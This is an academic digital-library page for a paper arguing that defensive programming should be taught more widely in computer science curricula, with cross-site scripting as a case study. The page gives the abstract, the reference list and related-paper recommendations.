ABSTRACT
This paper presents principles of Defensive Programming and examines the growing concern that these principles are not effectively incorporated into Computer Science and related computing degree programs' curricula. To support this concern, Defensive Programming principles are applied to a case study - Cross-site Scripting cybersecurity attacks. This paper concludes that Defensive Programming plays an important role in preventing these attacks and should thus be more aggressively integrated into CS courses such as Programming, Algorithms, Databases, Computer Architecture and Organization, and Computer Networks.
- Robert Auger. 2011. Cross Site Scripting. (February 2011). Retrieved February 9, 2017 from http://projects.webappsec.org/w/page/13246920/Cross%20Site%20ScriptingGoogle Scholar
- Padraic Brady. Input Validation. (n.d). Retrieved February 6, 2017 from http://phpsecurity.readthedocs.io/en/latest/Input-Validation.htmlGoogle Scholar
- Mukesh Kumar Gupta, M. C. Govil, and Girdhari Singh. 2014. Static Analysis Approaches to Detect SQL Injection and Cross Site Scripting Vulnerabilities in Web Applications: A Survey. In International Conference on Recent Advances and Innovations in Engineering (ICRAIE). IEEE, 1--5.Google ScholarCross Ref
- DOI:Google Scholar
- Logan Kugler. 2017. How a Supervillain (or a Hacker in His Basement) Could Destroy the Internet. Communications of the ACM 59, 2 (2017), 18--20. Google ScholarDigital Library
- Dana Nourie and Mike McCloskey. 2002. Regular Expressions and the Java Programming Language. (April 2002). Retrieved February 7, 2017 from http://www.oracle.com/technetwork/articles/java/regex-1564923.htmlGoogle Scholar
- Linda Null. 2004. Integrating security across the computer science curriculum. Journal of Computing Sciences in Colleges 19, 5 (May 2004), 170--178. Google ScholarDigital Library
- Oracle Technology Network. Secure Coding Guidelines for Java SE. (n.d.). Retrieved February 4, 2017 from http://www.oracle.com/technetwork/java/seccodeguide-139067.html#5Google Scholar
- OWASP ASIDE Project. (n.d.). Retrieved February 2, 2017 from https://www.owasp.org/index.php/OWASP_ASIDE_ProjectGoogle Scholar
- Thomas H. Park, Brian Dorn, and Andrea Forte. 2015. An Analysis of HTML and CSS Syntax Errors in a Web Development Course. ACM Transactions on Computing Education (TOCE) -- Special Issue on Web Development 15, 1, 4 (March 2015). Google ScholarDigital Library
- Kirti Randhe and Vishal Mogal. 2014. Defense against SQL Injection and Cross Site Scripting Vulnerabilities. International Journal of Science and Research (IJSR) 3, 11 (November 2014), 2198--2201. DOI: http://www.ijsr.net/archive/v3i11/T0NUMTQxNTIz.pdfGoogle Scholar
- Suman Saha. 2009. Consideration Points: Detecting Cross-Site Scripting. (IJCSIS) International Journal of Computer Science and Information Security 4, 1 & 2 (August 2009), 8 pages. DOI: https://arxiv.org/abs/0908.4188Google Scholar
- Frank Schindler. 2006. Coping with Security in Programming. Acta Polytechnica Hungarica 3, 2 (2006), 65--72.Google Scholar
- Antonin Steinhauser and François Gauthier. 2016. JSPChecker: Static Detection of Context-Sensitive Cross-Site Scripting Flaws in Legacy Web Applications. Proceeding of the 2016 ACM Workshop on Programming Languages and Analysis for Security, 57--68. Google ScholarDigital Library
- Sandeep D. Sukhdeve and Hemlata Channe. 2016. The Code Sanitizer: Regular Expression Based Prevention of Content Injection Attacks. International Journal of Computer Trends and Technology (IJCTT) 35, 1 (May 2016), 21--28.Google Scholar
- Jeff Williams, Jim Manico, and Neil Mattatall. 2017. XSS (Cross Site Scripting) Prevention Cheat Sheet. (February 2017). Retrieved February 9, 2017 from https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_SheetGoogle Scholar
- Marsha Zaidman. 2004. Teaching defensive programming in Java. Journal of Computing Sciences in Colleges 19, 3 (January 2004), 33--43. Google ScholarDigital Library
- Jun Zhu, Jing Xie, Heather Richter Lipford, Bill and Chu. 2014. Supporting secure programming web applications through interactive static analysis. Journal of Advanced Research 50, 1 (July 2014), 449--462.Google Scholar
Recommendations
Defensive programming: using an annotation toolkit to build DoS-resistant software
OSDI '02: Proceedings of the 5th Symposium on Operating Systems Design and ImplementationThis paper describes a toolkit to help improve the robustness of code against DoS attacks. We observe that when developing software, programmers primarily focus on functionality. Protecting code from attacks is often considered the responsibility of the ...
A posteriori defensive programming: an annotation toolkit for DoS-resistant component-based architectures
SAC '06: Proceedings of the 2006 ACM symposium on Applied computingDenial-of-Service (DoS) attacks are a major concern for modern distributed applications. They exploit weakness in the software in order to make it unavailable to well-behaved users. Building DoS resistant software is still an issue. Solutions relying on ...
Security beyond cybersecurity: side-channel attacks against non-cyber systems and their countermeasures
AbstractSide-channels are unintended pathways within target systems that leak internal information, exploitable via side-channel attack techniques that extract the target information, compromising the system’s security and privacy. Side-channel attacks ...
Comments